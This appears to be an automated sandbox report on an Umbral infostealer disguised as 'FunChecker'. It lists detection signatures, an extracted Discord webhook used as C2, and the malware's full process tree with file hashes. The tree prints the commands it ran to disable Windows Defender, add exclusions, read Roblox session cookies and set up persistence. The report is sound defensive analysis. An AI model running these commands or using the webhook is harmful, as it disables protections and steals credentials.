Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    18-07-2024 11:17

General

  • Target

    https://mega.nz/file/VPNhzQ6T#rJlMaWgUDtOlnXZQY15sJ-NnSS2mPSSUDRMIwEr5_mc

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1263163627955818638/O6H0XtkfVMlzt1CR2LtuxnT8hf_eK3rxCg4Z8Ho7QTiBTbC3moAh35BYkmVLUE-l4NEA

Signatures

  • Detect Umbral payload 3 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 14 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://mega.nz/file/VPNhzQ6T#rJlMaWgUDtOlnXZQY15sJ-NnSS2mPSSUDRMIwEr5_mc
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa74989758,0x7ffa74989768,0x7ffa74989778
      2⤵
        PID:4588
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:2
        2⤵
          PID:712
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1784 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:8
          2⤵
            PID:3112
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1996 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:8
            2⤵
              PID:4468
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2848 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:1
              2⤵
                PID:4688
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2856 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:1
                2⤵
                  PID:4700
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4684 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:8
                  2⤵
                    PID:4896
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:8
                    2⤵
                      PID:4364
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4984 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:8
                      2⤵
                        PID:4160
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:8
                        2⤵
                          PID:4724
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:8
                          2⤵
                            PID:4912
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5736 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:1
                            2⤵
                              PID:4668
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1820 --field-trial-handle=1844,i,3593435072242433331,6232904304319358769,131072 /prefetch:2
                              2⤵
                                PID:5580
                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                              1⤵
                                PID:3056
                              • C:\Windows\system32\AUDIODG.EXE
                                C:\Windows\system32\AUDIODG.EXE 0x404
                                1⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2744
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:4300
                                • C:\Program Files\7-Zip\7zFM.exe
                                  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\FunChecker.zip"
                                  1⤵
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  • Suspicious use of FindShellTrayWindow
                                  PID:4456
                                  • C:\Users\Admin\AppData\Local\Temp\7zO8611BA08\FunChecker.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7zO8611BA08\FunChecker.exe"
                                    2⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2116
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
                                      3⤵
                                        PID:1508
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                          4⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          PID:524
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                          4⤵
                                            PID:3672
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                            4⤵
                                              PID:4900
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                              4⤵
                                                PID:1240
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                4⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                PID:412
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                4⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                PID:2400
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                4⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                PID:428
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                4⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                PID:3408
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                4⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                PID:4352
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                4⤵
                                                  PID:2536
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                  4⤵
                                                    PID:1360
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                    4⤵
                                                      PID:2240
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                      4⤵
                                                        PID:4264
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                        4⤵
                                                          PID:2668
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                          4⤵
                                                            PID:2480
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                            4⤵
                                                              PID:4320
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                              4⤵
                                                                PID:2756
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                4⤵
                                                                  PID:1120
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                  4⤵
                                                                    PID:3540
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                    4⤵
                                                                      PID:2748
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                      4⤵
                                                                        PID:4152
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                        4⤵
                                                                          PID:2776
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                          4⤵
                                                                          • Modifies registry class
                                                                          PID:4784
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                          4⤵
                                                                          • Modifies registry class
                                                                          PID:4948
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                          4⤵
                                                                          • Modifies registry class
                                                                          PID:4584
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                          4⤵
                                                                            PID:2296
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                            4⤵
                                                                              PID:3868
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                              4⤵
                                                                                PID:3568
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                4⤵
                                                                                  PID:2112
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                  4⤵
                                                                                  • Modifies security service
                                                                                  PID:3680
                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                                                                3⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Drops file in Drivers directory
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Checks whether UAC is enabled
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:2356
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
                                                                                  4⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:5036
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                  4⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1648
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                  4⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:5796
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                  4⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:6040
                                                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                  "wmic.exe" os get Caption
                                                                                  4⤵
                                                                                    PID:5036
                                                                                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                    "wmic.exe" computersystem get totalphysicalmemory
                                                                                    4⤵
                                                                                      PID:5912
                                                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                      "wmic.exe" csproduct get uuid
                                                                                      4⤵
                                                                                        PID:3616
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:6012
                                                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                        "wmic" path win32_VideoController get name
                                                                                        4⤵
                                                                                        • Detects videocard installed
                                                                                        PID:5464
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"
                                                                                      3⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Drops startup file
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:2332
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4584
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5836
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunChecker.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:6020
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunChecker.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5392
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunChecker" /tr "C:\Users\Admin\AppData\Roaming\FunChecker.exe"
                                                                                        4⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:5304
                                                                                    • C:\Users\Admin\AppData\Local\Temp\system32.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\system32.exe"
                                                                                      3⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Drops startup file
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:764
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4352
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system32.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5296
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5792
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5140
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive"
                                                                                        4⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:2912
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "
                                                                                      3⤵
                                                                                        PID:3400
                                                                                        • C:\Windows\SysWOW64\chcp.com
                                                                                          chcp 65001
                                                                                          4⤵
                                                                                            PID:1732
                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                      1⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:1240

                                                                                    Network

                                                                                    MITRE ATT&CK Enterprise v15

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                      Filesize

                                                                                      72B

                                                                                      MD5

                                                                                      78152d270c74337498d1922e3b317955

                                                                                      SHA1

                                                                                      8b3d741a2045906adf43487034ff1da311946775

                                                                                      SHA256

                                                                                      4404f27646ab5a60ba871c0e7cc0d1e3b0fa3f51206f65f703f2dc2e16f8272d

                                                                                      SHA512

                                                                                      a986515d479fc155d03a4d3bd5e6ac1a35d9c6fdfc4657f3a9a2e273448024b7c9ea99f2c0153198e4ba327d5ce35bbe283d1cf0fe9d82faf6c6cfcd57495a57

                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\MANIFEST-000001

                                                                                      Filesize

                                                                                      41B

                                                                                      MD5

                                                                                      5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                      SHA1

                                                                                      d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                      SHA256

                                                                                      f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                      SHA512

                                                                                      de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

                                                                                      Filesize

                                                                                      16B

                                                                                      MD5

                                                                                      46295cac801e5d4857d09837238a6394

                                                                                      SHA1

                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                      SHA256

                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                      SHA512

                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

                                                                                      Filesize

                                                                                      176B

                                                                                      MD5

                                                                                      60e2d8715b5bddf19149c93f9bea2abd

                                                                                      SHA1

                                                                                      634c57995fe299faf59da6f288cd87538e287e46

                                                                                      SHA256

                                                                                      e7e2e9029760d1b02048f491b3eb8958b3dd3562a28086a54c10874b5b379714

                                                                                      SHA512

                                                                                      d7cbc82d56bebe1168ea1e11283d65e18fbfbbe1e36cbadb25f96df7c577330256a167193166a50789e3aa1aa723f7c31f6cd62283fa38c1c64549765358b975

                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      7a8a9038ddaa0f66ece10117e54bba4f

                                                                                      SHA1

                                                                                      7e49ceb1cb8f78ec3b671fd41e2c2e6d2d8cd964

                                                                                      SHA256

